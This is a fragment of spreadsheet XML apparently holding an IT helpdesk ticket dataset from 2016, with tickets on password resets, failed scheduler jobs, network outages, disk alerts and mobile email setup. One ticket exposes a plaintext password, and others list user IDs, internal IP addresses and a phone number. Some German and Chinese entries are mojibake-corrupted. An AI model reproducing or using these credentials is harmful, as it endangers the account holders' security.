cc: -kds sw11-services; kaguhxwo uoyipxqg
subject: re: order: 35872594
din,
please create ticket to it for help.
juhu jojfufn
ap logistics manager
from: -kds mmaster 
sent: monday, august 08, 2016 1:11 pm
to: rxoynvgi ntgdsehl
cc: -kds sw11-services; johthryugftyson hu; kaguhxwo uoyipxqg
subject: re: order: 35872594
hi zadnryuinudin,
rqfhiong zkwfqagb team can only create sto. we are not authorized to create dn. plant_298 warehouse persons can create dn for the sto 5018078764.
</t>
  </si>
  <si>
    <t>probleme mit drucker in lÃ¶we uacyltoe hxgayczeraum\reinhard krÃ¶ger</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_501</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_501 at 08/08/16 03:24:23</t>
  </si>
  <si>
    <t>outlook is not taking password</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_489</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_489 at 08/08/16 03:13:29</t>
  </si>
  <si>
    <t>telefon hÃ¶rer am apparat fertigung halle c defekt</t>
  </si>
  <si>
    <t>einlasten bei it-plant germany</t>
  </si>
  <si>
    <t>fw: an ''ethical moment'' from the office of ethics and compliance... link not opening</t>
  </si>
  <si>
    <t xml:space="preserve">hi_x000D_
_x000D_
this link is not opening._x000D_
_x000D_
from: .ethics@company.com [mailto:.ethics@company.com] _x000D_
sent: wednesday, august 03, 2016 7:30 pm_x000D_
to: qfwijzbd gmkiatjs_x000D_
subject: an ''ethical moment'' from the office of ethics and compliance_x000D_
_x000D_
dear team: _x000D_
_x000D_
the office of ethics and compliance provides company employees with periodic ethical moments to remind you of your responsibility in practicing good ethical habits. _x000D_
_x000D_
click here to access the current ''ethical moment'' _x000D_
_x000D_
sethdyr hdtyr_x000D_
the office of ethics &amp; compliance _x000D_
</t>
  </si>
  <si>
    <t>qfwijzbd gmkiatjs</t>
  </si>
  <si>
    <t>now acces to the  internet  - webside allways offline</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: blktuiae.jzakfmhw@gmail.com_x000D_
_x000D_
fyi_x000D_
now access to the  internet  - webside allways offline_x000D_
_x000D_
till this weekend_x000D_
_x000D_
i am located in fÃ¼rth _ germany_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>link to ethics ethical moment does not work.</t>
  </si>
  <si>
    <t>i am not able to open the ethical moment link either in the e-mail nor from the collaboration_platform site. i tried both the german and english language button.</t>
  </si>
  <si>
    <t>upgrade from ms office 2010 64bit to office 2013 32bit</t>
  </si>
  <si>
    <t>for further using of the software cutview it is a need to install / upgrade to an 32 bit office system_x000D_
pls untinstall the current office 2010 64bit version and install the 2013 or 2016 32 bit version</t>
  </si>
  <si>
    <t>pblitjvq yqpjcfgx</t>
  </si>
  <si>
    <t xml:space="preserve">computer network connection lost </t>
  </si>
  <si>
    <t>pjzhkbus mpcyxvdj</t>
  </si>
  <si>
    <t xml:space="preserve">windows account locked and reset password </t>
  </si>
  <si>
    <t>nfckwprm iykptjna</t>
  </si>
  <si>
    <t>system monitor resolution problem</t>
  </si>
  <si>
    <t>not able to set resolution 1920 x 1080</t>
  </si>
  <si>
    <t>windows need to be repair</t>
  </si>
  <si>
    <t>abiuclvj brziktno</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open net weaver </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2584 at 08/08/16 01:31:28</t>
  </si>
  <si>
    <t>the calendar on my iphone is not showing any meetings</t>
  </si>
  <si>
    <t>name:srinfhyath
language:
browser:microsoft internet explorer
email:kflqpite.gbeoqsnc@gmail.com
customer number:
telephone:+91-
summary:hi, the calendar on my iphone is not showing any meetings</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_1 account locked </t>
  </si>
  <si>
    <t>qzvireok yzuplcgw</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_481</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_481 at 08/08/16 01:26:28</t>
  </si>
  <si>
    <t>reset my password</t>
  </si>
  <si>
    <t>my SID_51 system password has been locked due to too many failed attempts. please unlock my user id: gortyhlia and password. pls find attached error screenshot for your reference.</t>
  </si>
  <si>
    <t>bobj repository issue - pls see the attachment for more details</t>
  </si>
  <si>
    <t>efdhrlwv aoxtugzr</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 account lokced </t>
  </si>
  <si>
    <t>dnprzuox fwiospxy</t>
  </si>
  <si>
    <t>not able to login to ethics</t>
  </si>
  <si>
    <t>juelbpyf ozvgnuwb</t>
  </si>
  <si>
    <t>laptop is over heating,  left side usb and audio output plug also not working, system is slow</t>
  </si>
  <si>
    <t>the terminate action for kgarnzdo vkrqojyt has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">from: noscwdpm akiowsmp [mailto:system@hr_tool.com] _x000D_
sent: monday, august 08, 2016 9:21 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: rad:the terminate action for kgarnzdo vkrqojyt has completed._x000D_
_x000D_
hello , _x000D_
_x000D_
a termination for kgarnzdo vkrqojyt, 11313060, effective 07/26/2016  has been approved._x000D_
_x000D_
click the link to view._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">can't login to skype ,indicate certificate expired </t>
  </si>
  <si>
    <t xml:space="preserve">skype for business software can't be used </t>
  </si>
  <si>
    <t>erpæ— æ³•è¿›è¡Œé‡‡è´­ï¼ˆè½¬ç»™è´ºæ­£å¹³ï¼‰</t>
  </si>
  <si>
    <t>è¿›è¡Œé‡‡è´­æ—¶æ˜¾ç¤º"æ‰¾ä¸åˆ°å‘˜å·¥1111154833çš„æ•°æ®ï¼Œè¯·é€šçŸ¥ç³»ç»Ÿç®¡ç†å‘˜"</t>
  </si>
  <si>
    <t>khyzsgnv aletvocx</t>
  </si>
  <si>
    <t>windows log in password reset</t>
  </si>
  <si>
    <t xml:space="preserve">from: nkiopevt gufwhdky [mailto:nkiopevt.gufwhdky@gmail.com] _x000D_
sent: monday, august 08, 2016 7:44 am_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: wgpimkle kijhcwur_eh_x000D_
subject: rad:windows log in password reset_x000D_
importance: high_x000D_
_x000D_
hi it team_x000D_
_x000D_
i cannot log in to windows._x000D_
please reset windows password reset._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>å¯†ç æ›´æ”¹åŽï¼Œoutlookæ— æ³•ç™»é™†</t>
  </si>
  <si>
    <t>yamndlrz nzcvdmtr</t>
  </si>
  <si>
    <t>please reset my erp password.</t>
  </si>
  <si>
    <t>ckgwemna cgnziqxj</t>
  </si>
  <si>
    <t>network outage : south amerirtca(argentina) site is hard down since 05:04pm et on 08/07.</t>
  </si>
  <si>
    <t>what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _05:04pm et on 08/07_____________________x000D_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___no___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</si>
  <si>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received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2114 at 08/07/16 17:33:26</t>
  </si>
  <si>
    <t>network outage: usa site is hard down since 05:04 pm et on 08/07.</t>
  </si>
  <si>
    <t>what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _05:04 pm et on 08/07_____________________x000D_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</si>
  <si>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abended job in job_scheduler: Job_1640</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1640 at 08/07/16 16:57:27</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: snp_heu_5_regen at 08/07/16 15:28:25</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bk_hana_SID_62_erp_wly_dp at 08/07/16 13:24:24</t>
  </si>
  <si>
    <t xml:space="preserve">lhqsm673 ( kashfyujqti jdcbiezx1 ) disk free on c:\ is now 14%, which is below the warning threshold (15%) </t>
  </si>
  <si>
    <t>lhqsm673 ( kashfyujqti jdcbiezx1 ) disk free on c:\ is now 14%, which is below the warning threshold (15%) out of total size 75.0 gb</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bwhrattr</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bwhrattr at 08/07/16 09:21:24</t>
  </si>
  <si>
    <t>HostName_1238 ( south_amerirtca, br -plm dsc file - production) wrong number of instances of process dsccache.exe, expected instan</t>
  </si>
  <si>
    <t>HostName_1238 ( south_amerirtca, br -plm dsc file - production) dsccache.exe: wrong number of instances of process dsccache.exe, expected instances gte 1 but found 0</t>
  </si>
  <si>
    <t>HostName_1218(usa, va-plm web-file cache - production): dsccache.exe service is down since 1:08am est on 08/07/16</t>
  </si>
  <si>
    <t>HostName_986:(plm conversion-  production) alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, expected instances gte 5 but found 4</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: snp_heu_1_regen at 08/07/16 06:13:25</t>
  </si>
  <si>
    <t>HostName_1042(bobj-ds-app &amp; web - prod) : al_engine.exe service is down.</t>
  </si>
  <si>
    <t>HostName_1042(bobj-ds-app &amp; web - prod) : al_engine.exe service is down (al_engine.exe: wrong number of instances of process al_engine.exe, expected 1 - found 0)</t>
  </si>
  <si>
    <t>vip:2 log in proplems vip</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: oxrnpuys.oxizkwmq@gmail.com_x000D_
_x000D_
dear helpdesk._x000D_
i was on vacation and briefly before i left i changed my password as required._x000D_
now it seems that my main windows log in is still with the old password, while outlook sype etc. is already on the new password._x000D_
_x000D_
also, the company main log on is not right._x000D_
i usually log in with my  company.com account, which is not appearing any more._x000D_
_x000D_
what needs to be done._x000D_
_x000D_
i am not and will not be at a company site ( network ) for another week._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>bw jobs are failing because of the server issue</t>
  </si>
  <si>
    <t>bw jobs are failing because of the server issue. could you please check &amp; confirm. please refer the screen shot sent in an email.</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1305 at 08/07/16 01:24:27</t>
  </si>
  <si>
    <t xml:space="preserve">reboot tax_interface dev servers HostName_972 and HostName_971 at  8/7/2016 1:00 am </t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1315</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1315 at 08/07/16 00:38:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: bk_hana_SID_22_erp_wly_dp</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bk_hana_SID_22_erp_wly_dp at 08/07/16 00:31:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1383</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1383 at 08/07/16 00:23:25</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1142 at 08/07/16 00:08:26</t>
  </si>
  <si>
    <t>abend batch  SID_51stat</t>
  </si>
  <si>
    <t>job name: SID_51stat.</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_51_start_hana_slt</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_51_start_hana_slt at 08/06/16 23:31:27</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_43cold at 08/06/16 23:17:27</t>
  </si>
  <si>
    <t>recall: re:chg1144575 - approve</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vkezwolt.fgnqzeai@gmail.com_x000D_
_x000D_
vkezwolt fgnqzeai would like to recall the message, "re:chg1144575 - approve"._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_51start</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_51start at 08/06/16 22:56:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_46cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_46cold at 08/06/16 22:29:25</t>
  </si>
  <si>
    <t>erp SID_34 is not available</t>
  </si>
  <si>
    <t>i connected through vpn to look up information and erp will not connect. i was able to connect to our local drive plant_101 departments drive but not erp.</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_47cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_47cold at 08/06/16 20:26:24</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_27hot at 08/06/16 20:21:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_51cold</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_51cold at 08/06/16 20:15:25</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_79cold at 08/06/16 20:10:24</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_35cold at 08/06/16 19:55:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_3032</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_3032 at 08/06/16 19:09:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_51stop</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_51stop at 08/06/16 18:14:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1665</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1665 at 08/06/16 18:06:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: SID_51_stop_hana_slt</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: SID_51_stop_hana_slt at 08/06/16 17:50:24</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1428</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1428 at 08/06/16 12:01:26</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_2078</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_2078 at 08/06/16 10:11:26</t>
  </si>
  <si>
    <t>erp is locked out need to unlock it</t>
  </si>
  <si>
    <t>frbxjdti lhkofcvs</t>
  </si>
  <si>
    <t>a recently created variable fails to get opened in bobj analyser due to attached error message</t>
  </si>
  <si>
    <t>vmax disk failed?on df-6a-d-0 is failed</t>
  </si>
  <si>
    <t>reporting_tool alert:the monitor is the disk failed? on df-6a-d-0/000192604484/localhost is outside expected limits (true = true)</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bkwin_HostName_768_inc at 08/06/16 07:46:25</t>
  </si>
  <si>
    <t>network outage: sao pollaurido-mercedes benz plant network is down since 6:45am et on 08/06/16. no backup circuit</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________6:45am on 08/06/16_____________x000D_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___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ____no_____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___________global_telecom_1 #331206737 ______________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>abended job in job_scheduler: apo_cif_pds5_am</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: apo_cif_pds5_am at 08/06/16 07:17:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: apo_cif_pds5_eu</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: apo_cif_pds5_eu at 08/06/16 07:16:25</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1319</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1319 at 08/06/16 01:37:24</t>
  </si>
  <si>
    <t>issue with downloading mail</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dwujlnhs.ecxvrpyl@gmail.com_x000D_
_x000D_
dear sir_x000D_
_x000D_
i am unable to download my mails out of india office, even if i am connected with internet._x000D_
kindly help in resolving the issue._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1141 at 08/05/16 23:45:28</t>
  </si>
  <si>
    <t>designation change required in outlook.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
-------- original message --------_x000D_
from: bvlcarfe aztlkeifowndararajan &lt;bvlcarfe.aztlkeif@gmail.com&gt; _x000D_
date: 06/08/2016 07:21 (gmt+05:30) _x000D_
to: sridthshar herytur &lt;antigvjx.zekluqim@gmail.com&gt; _x000D_
subject: gopi - designation change required in outlook. _x000D_
_x000D_
dear sir,_x000D_
 _x000D_
recently i have been elevated as area manager â€“ sales from assistant manager â€“ sales._x000D_
 _x000D_
kindly help me out to make the change in outlook contact details and collaboration_platform contact details._x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>bvlcarfe aztlkeif</t>
  </si>
  <si>
    <t>HostName_111 : average disk free on e:\ is now 10%, out of total size 750.0 gb</t>
  </si>
  <si>
    <t>noticed the alarm in reporting_tool ._x000D_
which is below the warning threshold (15%) ._x000D_
need to check .</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: bk_hana_SID_62_erp_dly_dp at 08/05/16 22:03:24</t>
  </si>
  <si>
    <t>inquiry on transfer of contacts from phone to system</t>
  </si>
  <si>
    <t>kuqmoaht uwsflbmo</t>
  </si>
  <si>
    <t>buehfyzp ygotimeu</t>
  </si>
  <si>
    <t>erp crm password reset</t>
  </si>
  <si>
    <t>wvrgfdey ybfrlkvo</t>
  </si>
  <si>
    <t>kirty india-two switches are down at 8:57 pm et on 08/05</t>
  </si>
  <si>
    <t>kirty india-two switches are down  at 8:57 pm et on 08/05</t>
  </si>
  <si>
    <t>inquiry about lotus notes</t>
  </si>
  <si>
    <t>grbkswuj outkgeya</t>
  </si>
  <si>
    <t>network outage : company-ap-chn-apac-company-2960-access-sw03 &amp; sw04 are down at 7:07 pm et on 08/05.</t>
  </si>
  <si>
    <t>apac : company-ap-chn-apac-company-2960-access-sw03 &amp; sw04 are down at 7:07 pm et on 08/05.</t>
  </si>
  <si>
    <t>apac-: robot HostName_17 is inactive</t>
  </si>
  <si>
    <t>apac: - robot HostName_17 is inactive</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: orjcgtyz.worylufs@gmail.com_x000D_
_x000D_
i changed my password  today but not all access locations were updated.  need to update all sites._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>orjcgtyz worylufs</t>
  </si>
  <si>
    <t>reset passwords for xuqvaobxuy ntqkuocz using password_management_tool password reset.</t>
  </si>
  <si>
    <t>change to new password: alabama4$</t>
  </si>
  <si>
    <t>update on inplant_848069</t>
  </si>
  <si>
    <t>hello.  please see the highlighted field below, "tax code".  this field is auto-populating and is inconsistent</t>
  </si>
  <si>
    <t xml:space="preserve">from: rushethryli h jacfgtykson [mailto:ckflmqoj.fojkrlmw@gmail.com] 
sent: saturday, august 06, 2016 2:29 am
to: nwfodmhc exurcwkm
subject: po tax code field auto-populate
hello.  please see the highlighted field below, "tax code".  this field is auto-populating and is inconsistent. 
is it possible to prevent from auto-populating?  where do the po's pull this information from?  
</t>
  </si>
  <si>
    <t>ckflmqoj fojkrlmw</t>
  </si>
  <si>
    <t>olzsuean sojwhbrv</t>
  </si>
  <si>
    <t>can you look and see why this received on line 20 and not line 10.</t>
  </si>
  <si>
    <t xml:space="preserve">from: efgoawct vwniefok _x000D_
sent: saturday, august 06, 2016 12:08 am_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: smxoklny hbecskgl_x000D_
subject: rak: can you look at this i tried to receive line10 only and it received the 90kg on line 20_x000D_
_x000D_
can you look and see why this received on line 20 and not line 10._x000D_
_x000D_
from: efgoawct vwniefok _x000D_
sent: friday, august 05, 2016 1:34 pm_x000D_
to: smxoklny hbecskgl_x000D_
subject: can you look at this i tried to receive line10 only and it received the 90kg on line 20_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>efgoawct vwniefok</t>
  </si>
  <si>
    <t>unlock account  email  in cell phone the users</t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
could you please unlock account  emails in cell phone the all users below:
gifpuwtb aykegsvr- id: bigrtdfatta (kelli.bigrtdfatta@company)
jlzsardp kumtcnwi- id: bactelephony_softwarea (jlzsardp.kumtcnwi@gmail.com)
sbinuxja vtbegcho - id: nicolmghyu (sbinuxja.vtbegcho@gmail.com)
rudfgbens rtwjunior: juniowsrr (glzshbja.aoehpltm@gmail.com)
jgnxyahz cixzwuyf - id: zigioachstyac (jgnxyahz.cixzwuyf@gmail.com)
alexansxcddre olovxcdeira: olivesadia2 (qbtvmhau.zowemnca@gmail.com)
pollaurido robhyertyjo- id: robsdgerp (writfxsq.nwmaxpts@gmail.com)
note: changed the cell phones the user to a new.
a wifi and data plan from your service provider is required to setup email on your mobile device.
is this device company owned?  y
is this a replacement of your old device?  y
if yes, please ensure company data has been removed from the old device (delete exchange setup from settings&gt; mail, contacts, calendar).
for a personal device, please attach approval form signed by manager to the ticketing_tool ticket. 
please ensure the device is company approved for email setup. 
if it is not a company approved device please contact the gsc.
for help with exchange setup on a personal device, please contact the device vendor.  you may also refer to the faq section for steps.
has the exchange setup been completed on your device?  y/n (you will receive an email stating the device has been quarantined when this is completed). this step needs to be completed for your device to register with company.
</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) </t>
  </si>
  <si>
    <t>HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%) out of total size 100.5 gb</t>
  </si>
  <si>
    <t>help with mss worklist since manager left company</t>
  </si>
  <si>
    <t xml:space="preserve">from: qekdgaim wagshrzl _x000D_
sent: saturday, august 06, 2016 1:37 am_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: amar help with mss worklist since manager left company_x000D_
_x000D_
hi,_x000D_
_x000D_
i'm writing on behalf of jdlxkygf wlzqaivr and mikhghytr ramdntysey. _x000D_
_x000D_
1.       jdlxkygf wlzqaivr: davidthd's former manager (and expense report approver), gergrythg bigleman, is no longer with the company. davidthd has an expense report in gergrythg's queue. _x000D_
2.       how does mikhghytr ramdntysey get access to that to approve and/or forward to the correct manager? _x000D_
3.       how can we ensure there are no other requests in gergrythg's universal worklist? _x000D_
_x000D_
note: our office will be closed, monday, september 5, 2016 for the labor day holiday._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>folder access \\HostName_29\kt-transition\infrastructure\security operations pragtyhusas</t>
  </si>
  <si>
    <t>provide access to hnynhsth jsuyhwssad (user id: pragtyhusas) to the below network folder.
folder access \\HostName_29\kt-transition\infrastructure\security operations</t>
  </si>
  <si>
    <t>bxspwfyo vzystwor</t>
  </si>
  <si>
    <t>unable to start dell 7350</t>
  </si>
  <si>
    <t>unable to start dell 7350 // stuck on welcome screen</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_37 bex password </t>
  </si>
  <si>
    <t>update contact number 330-328-8431 in ad</t>
  </si>
  <si>
    <t>update contact number 330 in ad</t>
  </si>
  <si>
    <t>crm configuration issue</t>
  </si>
  <si>
    <t>reset passwords for jrigdbox bgyluoqn using password_management_tool password reset.</t>
  </si>
  <si>
    <t>please reset erp password for beahleb......</t>
  </si>
  <si>
    <t>access SID_1 system -erp machine service tag gowzv12- asset tag 404766</t>
  </si>
  <si>
    <t xml:space="preserve">SID_1 model is not working in machine service tag gowzv12- asset tag 404766  - error attached _x000D_
need to produce some uacyltoe hxgayczes in SID_1 enviroment </t>
  </si>
  <si>
    <t xml:space="preserve">updated passwords and email on mobile device </t>
  </si>
  <si>
    <t>password_management_tool password manager password reset link</t>
  </si>
  <si>
    <t>bex report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nealxjbc.owjduxai@gmail.com_x000D_
_x000D_
i'm getting an error when i'm trying to run my bex report it won't allow me to log in to SID_37.  this is something i have run with no issues in the past.  i need this to run my daily reports._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vafjkslx ujancvlm</t>
  </si>
  <si>
    <t>expense account will not post</t>
  </si>
  <si>
    <t xml:space="preserve">my cost center changed on 7/1/2016 from ltm013 to ltm001.  i started an expense account for july, changed the cost assignment to ltm001, but the expense account will still not submit.  i receive this error message whenever i try to submit the expense account: "cost center 1company/ltm013 blocked against direct postings on 7/5/2016".  </t>
  </si>
  <si>
    <t>name:gncpezhx hopqcvza
language:
browser:microsoft internet explorer
email:uwiqchfp.hnsukjma@gmail.com
customer number:
telephone:
summary:tool access report</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_3194</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_3194 at 08/05/16 14:16:27</t>
  </si>
  <si>
    <t>screensaver of company center</t>
  </si>
  <si>
    <t>rvgykdzc defzmail</t>
  </si>
  <si>
    <t>abended job in job_scheduler: Job_1390</t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
 abended job in job_scheduler: Job_1390 at 08/05/16 14:08:26</t>
  </si>
  <si>
    <t>company screen saver was changed to company screen saver</t>
  </si>
  <si>
    <t>company screen saver was changed to company screen saver during the last it update on my pc.  please change back to company and fix the programdnty so all company screen savers don't get changed!</t>
  </si>
  <si>
    <t>infoblox at chicago office, 10.20.198.9 has stopped issuing ip addresses</t>
  </si>
  <si>
    <t>it is also beeping and the led is flashing.</t>
  </si>
  <si>
    <t>vitalyst icon to desktop</t>
  </si>
  <si>
    <t xml:space="preserve">hello helpdesk, _x000D_
_x000D_
can you help myhzrtsi rwnhqiyv to download the vitalyst icon to his desktop please. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>outlook keeps prompting for password</t>
  </si>
  <si>
    <t xml:space="preserve">
outlook keeps prompting for password</t>
  </si>
  <si>
    <t>kzeqbica kzcjeiyd</t>
  </si>
  <si>
    <t>need to know if 54.87.86.150 is able to send smtp via 10.32.1.100</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: mfyivqes.cpihaxbs@gmail.com_x000D_
_x000D_
please could someone check if 54.87.86.150 is allowed to send smtp via 10.32.1.100_x000D_
we need to have this possibility to send out inwarehouse_tool approvals via mail._x000D_
_x000D_
this functionality works in the past, and it's very important for our finance department._x000D_
please let me know why this has been stopped_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>mfyivqes cpihaxbs</t>
  </si>
  <si>
    <t xml:space="preserve">unlock account  email  in cell phone the user urgapyzt tnxiuramdnty id: vaghyliort </t>
  </si>
  <si>
    <t xml:space="preserve">hello team,
could you please unlock account  email  in cell phone the user urgapyzt tnxiuramdnty id: vaghyliort 
</t>
  </si>
  <si>
    <t xml:space="preserve">blank call // loud noise </t>
  </si>
  <si>
    <t>update of ae to bw and hana</t>
  </si>
  <si>
    <t xml:space="preserve">wesley tomlin &lt;xvmjocfn.bqxcdfiz@gmail.com&gt;; wilsfgtjl2
verboncouer, markhty a ???? verboma current manager - tgewaniq yepifgbl. does this need a change in mapping?  - chefgtnp2
mason, bengtjamin ??? masonb current manager - tgewaniq yepifgbl. does this need a change in mapping? - chefgtnp2
</t>
  </si>
  <si>
    <t xml:space="preserve">
mys, ptmjvysi vkrepcybwa - please confirm to change to itslpwra vybdkuoa - wilsfgtjl2
mikhghytr rushethryli &lt;trmhfxoz.bxofhryg@gmail.com&gt;; wilsfgtjl2
talryhtir, michghytuael ??? tayloml current manager - andrdgrtew c mohnrysu. does this need a change in mapping? - mondhrbaz
</t>
  </si>
  <si>
    <t xml:space="preserve">update of ae to bw and hana </t>
  </si>
  <si>
    <t>wiksufty, jimdghty l manager â€“ so i believe this user id does not need changes - zazrtulds
carmer, craigfgh cardfrmeca â€“ please confirm to change to itslpwra vybdkuoa - wilsfgtjl2
povich, trtgoy ??? mgr - povictcfgt current manager - andrdgrtew c mohnrysu. does this need a change in mapping? - mondhrbaz
 mohnrysu, andrdgrtew ??? current manager - johthryu c marftgytin. does this need a change in mapping? - magtyrtijc</t>
  </si>
  <si>
    <t>request to reset microsoft online services password for kzeqbica.kzcjeiyd@gmail.com</t>
  </si>
